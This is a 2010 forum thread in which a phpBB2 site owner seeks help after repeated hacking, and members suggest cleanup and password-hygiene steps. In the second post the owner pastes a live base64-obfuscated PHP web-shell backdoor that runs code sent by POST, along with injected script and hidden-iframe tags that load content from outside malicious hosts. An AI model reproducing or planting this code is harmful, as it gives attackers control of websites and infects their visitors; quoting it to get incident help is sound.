Author |
Message |
Sylver Cheetah 53 Board Member
Joined: 17 Dec 2008
Posts: 426 Location: Milky Way
|
Posted: Mon Jul 26, 2010 4:17 am Post subject: I got hacked... Again! |
|
|
Please... My forum does not work anymore.
It says:
phpBB : Critical Error
Could not query config information
DEBUG MODE
SQL Error : 1146 Table 'friendcc_phpbb.CONFIG_TABLE' doesn't exist
SELECT * FROM CONFIG_TABLE
Line : 215
File : common.php
Also, I get a virus alert when trying to access it.
Please, help...
My forum is www.friendsforever.co.cc _________________ Image link
My Forum || My Blog
phpBB2 forever! |
|
Back to top |
|
|
Sylver Cheetah 53 Board Member
Joined: 17 Dec 2008
Posts: 426 Location: Milky Way
|
Posted: Mon Jul 26, 2010 4:34 am Post subject: Re: Could not query config information |
|
|
Probably, I've been hacked. At the begging of index.php I've found this strange code:
Code: | <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnazlvbnYnKSl7ZnVuY3Rpb24gazlvbnYoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM1JvWld4bFlYSnVhVzVuWTJGdWRtRnpMbU52YlM5cGJtUmxlRjltYVd4bGN5OW1jQzV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIGs5b252MigkYSwkYiwkYywkZCl7Z2xvYmFsJGs5b252MTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkazlvbnYxKSljYWxsX3VzZXJfZnVuYygkazlvbnYxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdrOW9udicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2s5b252Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGs5b252bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignazlvbnYyJykpIT0nazlvbnYyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php |
And this is my logs file: http://friendsforever.co.cc/files/ftp.friendsforever.co.cc-ftp_log
Damn.
LATER EDIT: I've replaced some files, mostly from "includes" folder, and now the forum is working, but there are at least still two isues:
1.I still get the virus alert. Where could the virus be? I want it found and killed!
2.BB codes not showing up. I get the following error message:
Parse error: syntax error, unexpected '<' in /home/friendcc/public_html/includes/bbcode.php(61) : eval()'d code on line 24
I've replace the file but still same errror...
LATER EDIT: I've found a script in index.html files:
Code: | <script src=http://thelearningcanvas.com/index_files/fp.php ></script><body><iframe src="http://q1m.ru:8080/index.php" width=169 height=161 style="visibility: hidden"></iframe> |
And this was in bbcode.tpl:
Code: | <script src=http://thelearningcanvas.com/index_files/fp.php ></script> |
_________________ Image link
My Forum || My Blog
phpBB2 forever! |
|
Back to top |
|
|
Acaria Board Member
Joined: 20 Feb 2009
Posts: 238
|
Posted: Tue Jul 27, 2010 12:56 am Post subject: Re: Could not query config information |
|
|
What kind of CPanel does your host use? I'd contact them immediately about these recurring issues you have with hackers. It's obviously fault on their end, because such constant and malicious hacking cannot come from PhpBB2. It would have been discovered, abused, and fixed by now. |
|
Back to top |
|
|
Sylver Cheetah 53 Board Member
Joined: 17 Dec 2008
Posts: 426 Location: Milky Way
|
Posted: Tue Jul 27, 2010 6:08 am Post subject: Re: Could not query config information |
|
|
They say phpBB is no good... But that's what they always say.
I see there... cPanel Pro 1.0 RC1. Not sure if that's the one, but this is what I see.
Anyway... Yesterday I was replacing compromised files, but the were hacked again only a few hours later. Ever if I changed the password. Let see what happenes today.
Strangely, the last time I was hacked it was on 25 july 2009. And now... 25 july 2010.
Google is now showing a warning on my website... That it has malware. Damn!
LATER EDIT: By the way. What's with this errors:
Code: | Warning: Cannot modify header information - headers already sent by (output started at /home/friendcc/public_html/config.php:16) in /home/friendcc/public_html/includes/sessions.php on line 366
Warning: Cannot modify header information - headers already sent by (output started at /home/friendcc/public_html/config.php:16) in /home/friendcc/public_html/includes/sessions.php on line 367
Warning: Cannot modify header information - headers already sent by (output started at /home/friendcc/public_html/config.php:16) in /home/friendcc/public_html/includes/functions.php on line 1054
Warning: Cannot modify header information - headers already sent by (output started at /home/friendcc/public_html/config.php:16) in /home/friendcc/public_html/includes/page_header.php on line 621
Warning: Cannot modify header information - headers already sent by (output started at /home/friendcc/public_html/config.php:16) in /home/friendcc/public_html/includes/page_header.php on line 627
Warning: Cannot modify header information - headers already sent by (output started at /home/friendcc/public_html/config.php:16) in /home/friendcc/public_html/includes/page_header.php on line 628 |
I replaced config.php, sessions.php, functions.php and page_header.php. _________________ Image link
My Forum || My Blog
phpBB2 forever! |
|
Back to top |
|
|
dogs and things Board Member
Joined: 18 Nov 2008
Posts: 628 Location: Spain
|
Posted: Tue Jul 27, 2010 6:52 am Post subject: Re: Could not query config information |
|
|
Have a look at http://blog.unmaskparasites.com/category/website-exploits/
Read the articles, probably you can find some good info there that can help you and your friend to find out what is wrong on the server-side. _________________ phpBB2 will never die, I hope! |
|
Back to top |
|
|
Slackervaara Board Member
Joined: 01 Jan 2009
Posts: 70
|
Posted: Wed Jul 28, 2010 12:51 am Post subject: Re: I got hacked... Again! |
|
|
The hacker might have got your ftp-password via keylogger and introduced a script on your site and thats why you are so rapidly hacked again. To protect myself from this I use:
NoScript as AddOn to avoid downloading key loggers or spyware.
Keepass Password Safe to avoid writing passwords on each time I use Ftp (good if the site is infected with spyware)
To use Linux as OS on your PC is also a protection against spyware.
It is important for you to check your PC with antivirus software to find the spyware on your PC.
If you have an exact copy of your site on your PC you could try to compare those files with the files on the site which could be made with FileZilla. You might then find the malicious script.
After that change your ftp-password on another PC.
Then you must find the spyware on your PC. |
|
Back to top |
|
|
dogs and things Board Member
Joined: 18 Nov 2008
Posts: 628 Location: Spain
|
Posted: Wed Jul 28, 2010 6:46 am Post subject: Re: I got hacked... Again! |
|
|
It is also possible that the server is infected through another website's ftp user/password. Another site hosted on the same server. _________________ phpBB2 will never die, I hope! |
|
Back to top |
|
|
lumpy burgertushie Board Member
Joined: 18 Nov 2008
Posts: 266
|
Posted: Thu Jul 29, 2010 4:12 pm Post subject: Re: I got hacked... Again! |
|
|
that is the most likely .
this is an old hack that is usually on the server side.
go into your ftp and check every folder for any files that are dated the same as the files that are hacked and get rid of them.
it will be in every index file on the server most likely.
and possibly other files as well.
I would delete all of your files on the server and upload a backup copies if you have them.
otherwise, take the time to check every single file if you have to.
then seriously consider changing hosts.
robert |
|
Back to top |
|
|
Holger Board Member
Joined: 19 Jan 2009
Posts: 509 Location: Hanover
|
Posted: Mon Aug 09, 2010 4:15 am Post subject: Re: I got hacked... Again! |
|
|
We had such a case some years ago.
The hackers had placed a script somewhere hidden in the folders. That script was run automatically by calling the URL from "outside" and it edited all the HTML-files on the server. |
|
Back to top |
|
|
|